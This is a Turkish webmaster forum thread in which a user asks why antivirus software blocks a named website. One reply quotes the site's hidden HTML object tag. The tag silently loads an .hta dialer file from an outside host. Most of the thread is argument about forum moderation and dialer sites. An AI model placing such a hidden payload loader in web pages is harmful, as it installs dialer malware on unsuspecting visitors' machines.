İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

yasaklinkler.com sahibine

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

dll

0
İyinet Üyesi
Onaylı Üye
Reaction score
0
www.yasaklinkler.com adresine girildiğinde antivirüs uyarı veriyor ve site kapanıyor. Acaba dialermi kullanıyor bu arkadaş? Yoksa benim antivirüsümdemi sorun var.

E

EskiDost

Misafir
işte de dialler

<object data="http://xfatihx.thefreebizhost.com/yas.hta?x=yas"
align="baseline" border="0" width="50" height="50"
style="display:none"></object>

object yöntemiyle çagrılan hta dosyası gelişmiş bir dildir.

afiyet olsun.

BEN KIMMIYIM DİALLER SAVAŞÇISI DARTANYAN.

T

TurkishDomains

Misafir
Arkadaşlar bu tür siteleri boşuna lanse etmeyin burada. Geçenlerde birkaç site lanse edildi ama iyinet admini arkadaşımız gerekli açıklamayı zaten yaptı. Admin arkadaşımıza göre, sırf yeni çıkan 2 mevzuatı incelemek için evine internet bağlatan memur da, tek amacı 2 eğlence sitesine girmek olan ev hanımı da derin bir sistem bilgisine sahip olmalı, sistemine sp2 kurmalı, son spywarelerle donatmalı bilgisayarını ve düzenli olarak güncellemeli, uptated virüs programları kullanmalı, sistemlerinin açıklarını kapatarak, dışardan kaçak girişleri, hek girişimlerini engelleyecek firewall programları kurmalı vs vs. Yani 2 tane siteye girmek için her vatandaş 6 ay sistem kurslarına devam etmeli, sonra internete açılmalı :p Halbuki daha kolayı var, dialer vs. işlere girişenler, yapanlar ahlaksız insanlardır, biz bunları uyararak da bir yere varamayız, çünkü zaten ahlaksız bu adamlar. Katile gidip adam öldürmemesi rica edilir mi :p Ama o katilleri aramızda barındırmamak bizim elimizde. Herkes üzerine düşeni yapmak zorunda.

Mahalleye hırsız girdiğinde, muhtarın mahallede hırsız var biliyorum ancak benim çelik kapım var, alın adresleri de burda, gidin çelik kapı yaptırın demesi garip, onun yerine hırsızları kovsa daha güzel bir mahalle olmazmıydı burası :p

Neyse millette Allah korkusu azaldıkça dialercıda, katilde kapkaçcıda hep varolacaktır. Biz dürüst insanlarda bu tür adamlarla yaşamak zorundayız. Parası olanlar, işi bilenler gitsin çelik kapı yaptırsın, bilmeyenlere, parası olmayanlara Allah yardım etsin diyelim, kapatalım bu konuyu :rolleyes:

c4timer

0
İyinet Üyesi
Reaction score
0
Tabi ; Tüm herkez bilgisayarını güncel tutmalı , 4-5 tane virüs koruması kurmalı , Services Pack 2 kurmalı , bilgisayarda daha MSN açamıyan adam bunları yapmalı , sadece maillere bakan adam yapmalı yoksa Banane kardeşim , Bulaşırsa bulaşsın.
IYInet admininden hiç böyle bir konuşma beklemezdim. Belki IYInet Turkiye'nin en iyi sitelerinden ama gözümde değeri düştü artıkk...

E

EskiDost

Misafir
Arkadaşlar Yatin Kalkin Bana Dua Edin.

Dartanyan Olmak Zor Iş Her Yazim Ayri Bir Belge...

Ben Kimmiyim Siz çok Iyi Bilirsiniz. Dartanyan

T

TurkishDomains

Misafir
Arkadaşlar bu platformda konu tartışıldı ve sonuçlandırılamadı. Tekrar edilmesi bence gereksiz. Kendi sitelerimizde, platformlarımızda interneti kirleten, insanlarımıza ciddi zararlar veren bu tür insanlarla mücadele etmek daha isabetli olacaktır. Gönül isterdi ki birçok arkadaşımızın olduğu, birçok konuyu güzel güzel tartışabildiğimiz iyinet forumlarında bu konu ilk gündeme geldiğinde bahsi geçen sitelerin listeden atılması idi ama atılmadı. Konuyu uzatarak forumu yıpratmanın, gündemi meşgul etmenin bir anlamı yok. En güzeli konuyu burada noktalayıp, başka platformlarda tartışmak.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5